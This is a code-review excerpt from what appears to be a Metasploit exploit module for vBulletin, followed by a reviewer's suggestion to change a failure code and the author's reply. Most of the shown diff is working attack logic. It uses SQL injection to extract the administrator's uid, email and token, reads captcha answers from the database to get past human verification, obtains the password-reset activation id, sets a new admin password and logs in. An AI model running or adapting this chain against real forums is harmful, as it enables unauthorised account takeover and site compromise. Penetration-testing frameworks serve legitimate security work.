modules/exploits/multi/http/vbulletin_getindexablecontent.rb

```diff
@@ -0,0 +1,663 @@
+      fail_with(Failure::UnexpectedReply, 'Could not retrieve administrator uid, username, email and token.')
+    end
+    print_good("Retrieved administrator uid: #{admin_uid} user: #{admin_user} email: #{admin_email} and password: #{admin_token}")
+
+    if !datastore['MANUALLOSTPASS']
+      # Determine HV type
+      hv_type = get_hv_type
+
+      # Generate HV token and get answer
+      if hv_type == 'Image'
+        hv_hash = get_hv_hash
+        hv_answer = get_hv_answer(node_id, table_prfx, hv_hash)
+        unless hv_hash && hv_answer
+          fail_with(Failure::UnexpectedReply, 'Could not retrieve human verification hash or answer.')
+        end
+      elsif hv_type == 'Question'
+        hv_hash = get_hv_hash
+        fail_with(Failure::UnexpectedReply, 'Could not retrieve human verification question hash.') unless hv_hash
+
+        ques_id = get_hv_answer(node_id, table_prfx, hv_hash)
+        fail_with(Failure::UnexpectedReply, 'Could not retrieve human verification question id.') unless ques_id
+
+        hv_question = get_hv_question(hv_hash)
+        hv_answer = get_hv_ques_answer(node_id, table_prfx, ques_id)
+        fail_with(Failure::UnexpectedReply, 'Could not retrieve human verification question or answer.') unless hv_question && hv_answer
+
+        print_good("Retrieved the HV question '#{hv_question}' and answer '#{hv_answer}' (regex).")
+      elsif hv_type == 'Recaptcha2'
+        fail_with(Failure::Unknown, "Site uses Recaptcha2, retry with MANUALLOSTPASS enabled and after a lost password request to an administrator account (#{admin_email})")
+      elsif hv_type == 'Disabled'
+
+      else
+        fail_with(Failure::Unknown, 'Invalid human verification type, you must request a new password for the administrator manually (and set MANUALLOSTPASS).')
+      end
+
+      # Make request to forget my password
+      brp_ret = begin_reset_pass(admin_email, hv_answer, hv_hash, hv_type)
+
+      # We fail here when the answer to the HV question contains a complex regex or is recaptcha2
+      fail_with(Failure::Unknown, 'Site requires captcha that we cannot bypass.') unless brp_ret
+    end
+
+    # Get Activation ID for forgot password request from DB
+    activation_id = do_sqli(node_id, table_prfx, 'activationid', 'useractivation', "userid = '#{admin_uid}'")
+    fail_with(Failure::UnexpectedReply, 'Could not retrieve activation id for forgot password request.') unless activation_id
+
+    # Make request setting new password
+    new_pass = rand_text_alphanumeric(rand(10..16))
+    rp_ret = reset_password(admin_uid, activation_id, new_pass)
+    fail_with(Failure::UnexpectedReply, "Error attempting to reset password with activation id '#{activation_id}'.") unless rp_ret
+
+    # Login to vBulletin
+    cookie_jar, login_token = login(admin_user, new_pass)
+    fail_with(Failure::UnexpectedReply, "Could not login with username: '#{admin_user}' and password: '#{new_pass}'.") unless login_token
```

Comment:
```suggestion
    fail_with(Failure::NoAccess, "Could not login with username: '#{admin_user}' and password: '#{new_pass}'.") unless login_token
```

Reply:
Whoops, fixed this use of Failure::UnexpectedReply to Failure::NoAccess. Thanks